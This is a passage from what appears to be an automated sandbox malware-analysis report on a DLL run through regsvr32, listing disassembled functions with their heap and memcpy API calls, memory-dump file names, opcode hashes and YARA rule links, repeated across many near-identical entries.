CloseHandle.KERNEL32 ref: 00007FF8A9341724
HeapFree.KERNEL32(?), ref: 00007FF8A9341900

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 7a199230194994a141ea2b5f255e1902a26be938285c6e57208e8c0f39b4893b
Instruction ID: 45930cb67b1bf88abf12928c93ed260cc21582018003a2b71c572608fe7ee642
Opcode Fuzzy Hash: 7a199230194994a141ea2b5f255e1902a26be938285c6e57208e8c0f39b4893b
Instruction Fuzzy Hash: E2715926A0AED694EB608F61D8403FD23B1FB84B99F016136CA5D9BB99DF389541C301

Function 00007FF8A934A490 Relevance: 5.1, APIs: 4, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A934A57F
memcpy.MSVCRT ref: 00007FF8A934A598
HeapFree.KERNEL32 ref: 00007FF8A934A65B
HeapFree.KERNEL32 ref: 00007FF8A934A675

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeapmemcpy
String ID:
API String ID: 673829100-0
Opcode ID: d6957715def72a4b84fdffda6a55135e6c3ad7079cd5b8b42c64aca4fb0b7981
Instruction ID: 2cf37253c15b011a7bbae3e9d8e8ed3df2ebf52bfabbcc28395d600d8b736228
Opcode Fuzzy Hash: d6957715def72a4b84fdffda6a55135e6c3ad7079cd5b8b42c64aca4fb0b7981
Instruction Fuzzy Hash: 3F518C22A09ED4A6E7059F25A8053E923B4FB88BC8F45A135DE4D57765EF38E1A5C300

Function 00007FF8A9337DA3 Relevance: 5.1, APIs: 4, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9337E02
HeapFree.KERNEL32 ref: 00007FF8A9337E21

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6e95642452edf8bfe2195f95b87f29dd5c3e2193d21cc49717314d503b32f2b2
Instruction ID: 33f8ef4bcd0a291bb2c113ff801c7bfc865fecef7ac464767f80a8f929375d55
Opcode Fuzzy Hash: 6e95642452edf8bfe2195f95b87f29dd5c3e2193d21cc49717314d503b32f2b2
Instruction Fuzzy Hash: 70416222A4EEC1A8FB649F61D8503FA23B5FB847C8F446036DA0D8B795CF7D95458300

Function 00007FF8A9327421 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9327737
HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cd7efd18000bbd183145134c62aa1632efeac5a76a281a79d29b60d1fd68afb1
Instruction ID: 2d39114e7aab22dab3fa922e66eeaf43f005b90ec5d0536557567bd6399611f0
Opcode Fuzzy Hash: cd7efd18000bbd183145134c62aa1632efeac5a76a281a79d29b60d1fd68afb1
Instruction Fuzzy Hash: C9412966E0EEC5A8FB20DF65D8513F823B1FB98788F446436CA4E86799DE3DA545C300

Function 00007FF8A9327497 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93274C1
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 424ad0b0270bac0c72a92c545cab50623caa7b2fe2889f8a2da2c1dc14ef46cc
Instruction ID: 0c4bfd49f09b1685187e86950c3716fc166ba27b1df326c9bc73547af420b6c7
Opcode Fuzzy Hash: 424ad0b0270bac0c72a92c545cab50623caa7b2fe2889f8a2da2c1dc14ef46cc
Instruction Fuzzy Hash: 70415C66E0EEC5A8EB50DF65D8503F823B1FB98B88F446036CA4E87794DE3DA545C300

Function 00007FF8A9327428 Relevance: 5.1, APIs: 4, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9327737
HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0bb46acf441583ef9b338bffe33abe575d247e98f4f341858a6de0ca8fb36321
Instruction ID: 0937dd1c17d6d512dcb6d22c3c8686617324e24dae1486f79ab9704f91edde57
Opcode Fuzzy Hash: 0bb46acf441583ef9b338bffe33abe575d247e98f4f341858a6de0ca8fb36321
Instruction Fuzzy Hash: 85412866E0EEC5A8FB20DF65D8513F823B1FB98788F446436CA4E86B94DE3DA545C300

Function 00007FF8A932742F Relevance: 5.1, APIs: 4, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A932D7F0: HeapFree.KERNEL32(?,?,?,?,00007FF8A9322AE5,?,?,00007FF8A9334545,?,?,?,00007FF8A932790C,?,?,?,?), ref: 00007FF8A932D83C
Part of subcall function 00007FF8A932D7F0: HeapFree.KERNEL32(?,?,?,?,00007FF8A9322AE5,?,?,00007FF8A9334545,?,?,?,00007FF8A932790C,?,?,?,?), ref: 00007FF8A932D84F
Part of subcall function 00007FF8A932D7F0: HeapFree.KERNEL32(?,?,?,?,00007FF8A9322AE5,?,?,00007FF8A9334545,?,?,?,00007FF8A932790C,?,?,?,?), ref: 00007FF8A932D88C

HeapFree.KERNEL32 ref: 00007FF8A9327737
HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 28a6f0f83e0a67cce6be4328e099f04266549f5cd66ea06786b9f5af26052328
Instruction ID: 856543906b629bc97ceed1a66dca1b560e09ef313f75c08551429d23fe335815
Opcode Fuzzy Hash: 28a6f0f83e0a67cce6be4328e099f04266549f5cd66ea06786b9f5af26052328
Instruction Fuzzy Hash: 41411866A0EEC5A8FB20DF65D8513F823B1FB98788F446036CA4E86795DE3DA545C300

Function 00007FF8A932740D Relevance: 5.1, APIs: 4, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9327737
HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a640d48f42fb024064c16b48f5f7b916bdaf68796727baf8b2bea284c2d4003d
Instruction ID: a74068793de41a7132d74c37331563390420a958124659d049c662e86db370b6
Opcode Fuzzy Hash: a640d48f42fb024064c16b48f5f7b916bdaf68796727baf8b2bea284c2d4003d
Instruction Fuzzy Hash: 85411866A0EEC5A8FB20DF65D8513F823B1FB98788F446036CA4E86795DE3DA545C300

Function 00007FF8A932A9C0 Relevance: 5.1, APIs: 4, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 7dcab15a25afd12cfa40928cb609c57d7eaf4288df903cecd842bf233f02cbd4
Instruction ID: c289fa5675e0279e1668f08fdb0950ccbfbba554d215ad6f1a4b8d1191768739
Opcode Fuzzy Hash: 7dcab15a25afd12cfa40928cb609c57d7eaf4288df903cecd842bf233f02cbd4
Instruction Fuzzy Hash: D0417E2290DFC4A6E7269F29D9413E823B0FB98798F04A222DF8C47751DF39D2A5C300

Function 00007FF8A932767F Relevance: 5.1, APIs: 4, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 81bd202239e1a02be7b2a2ddf9139458fa46ee743f2e8f5a0567acaf4f42843f
Instruction ID: 995fccabe35d5a1522ba057335fe57dd21abc6b7429ce4b287741dedaee8fe7c
Opcode Fuzzy Hash: 81bd202239e1a02be7b2a2ddf9139458fa46ee743f2e8f5a0567acaf4f42843f
Instruction Fuzzy Hash: 59412966A0EEC5A8FB54DF65D8513F823B1FB98B88F446036CA4E87794DE3DA551C300

Function 00007FF8A932756D Relevance: 5.1, APIs: 4, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9327789
HeapFree.KERNEL32 ref: 00007FF8A93277C6
HeapFree.KERNEL32 ref: 00007FF8A93277FA
HeapFree.KERNEL32 ref: 00007FF8A9327812

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 614c50f6ca0e1b5217f5767bf0dab9a1b6caf8a970bbaa8eaef40918485a577b
Instruction ID: 22c40195af22d124c7224c572d93de18ca8de772be6127757f9a7d751f784c59
Opcode Fuzzy Hash: 614c50f6ca0e1b5217f5767bf0dab9a1b6caf8a970bbaa8eaef40918485a577b
Instruction Fuzzy Hash: CF412966A0EEC5A8FB10DF65D8513F823B1EB98B88F446436CA4E87794DE3DA551C300

Function 00007FF8A9325968 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F
memcpy.MSVCRT ref: 00007FF8A9326133
HeapFree.KERNEL32 ref: 00007FF8A9326144

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 48cd72ec96ddfafecf7e0642ecaeb4dc4a73ea58f3ac8d6f0e0e4111ad13caf2
Instruction ID: 4c33981f33cbfbdeeb24828a9925ed73f853f18c8c6a4299852fae48faa63119
Opcode Fuzzy Hash: 48cd72ec96ddfafecf7e0642ecaeb4dc4a73ea58f3ac8d6f0e0e4111ad13caf2
Instruction Fuzzy Hash: B031C066A0EEC2A5EB648F25C8643F827B1EB557D8F00A232D92D877D8CE3DD540D341

Function 00007FF8A93434D1 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93434EE
HeapFree.KERNEL32 ref: 00007FF8A9343511
HeapFree.KERNEL32 ref: 00007FF8A93435F3
CloseHandle.KERNEL32 ref: 00007FF8A934390C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 976bab54dd6ea4f6442af5e21e3fe2a71e925d9815f329d455bcbd961097c0b9
Instruction ID: b97a154674c5d93dfe67cf95bdc8220b6dcdae965c6657f3cb47a7e3b0d4d59f
Opcode Fuzzy Hash: 976bab54dd6ea4f6442af5e21e3fe2a71e925d9815f329d455bcbd961097c0b9
Instruction Fuzzy Hash: BC317C22E1EEC1E8FB64DF65D9443FD23B0EB84789F156076CA0D9B698CF389585C601

Function 00007FF8A9325476 Relevance: 5.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f714866ea91c8bc6d84c80810eb16a265f3d906d05e18c518da4da0490cce9f1
Instruction ID: 0b279a7c571268cdab773c1dafe98f858abdf603dd1419cd5a04e1ef9122763a
Opcode Fuzzy Hash: f714866ea91c8bc6d84c80810eb16a265f3d906d05e18c518da4da0490cce9f1
Instruction Fuzzy Hash: 9731A225A0EEC2E5E7B08F25D8983F827B0EB547C8F54A032D90D86794CE3EE5419301

Function 00007FF8A93253F3 Relevance: 5.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: aaa39a4c98393ff635097adb283b0a558a10cbb644286456d830cdac8f06bef1
Instruction ID: 17726998d046f0a1bdf2dfc86c79e3167905c89052a977237376a6b3aa652f11
Opcode Fuzzy Hash: aaa39a4c98393ff635097adb283b0a558a10cbb644286456d830cdac8f06bef1
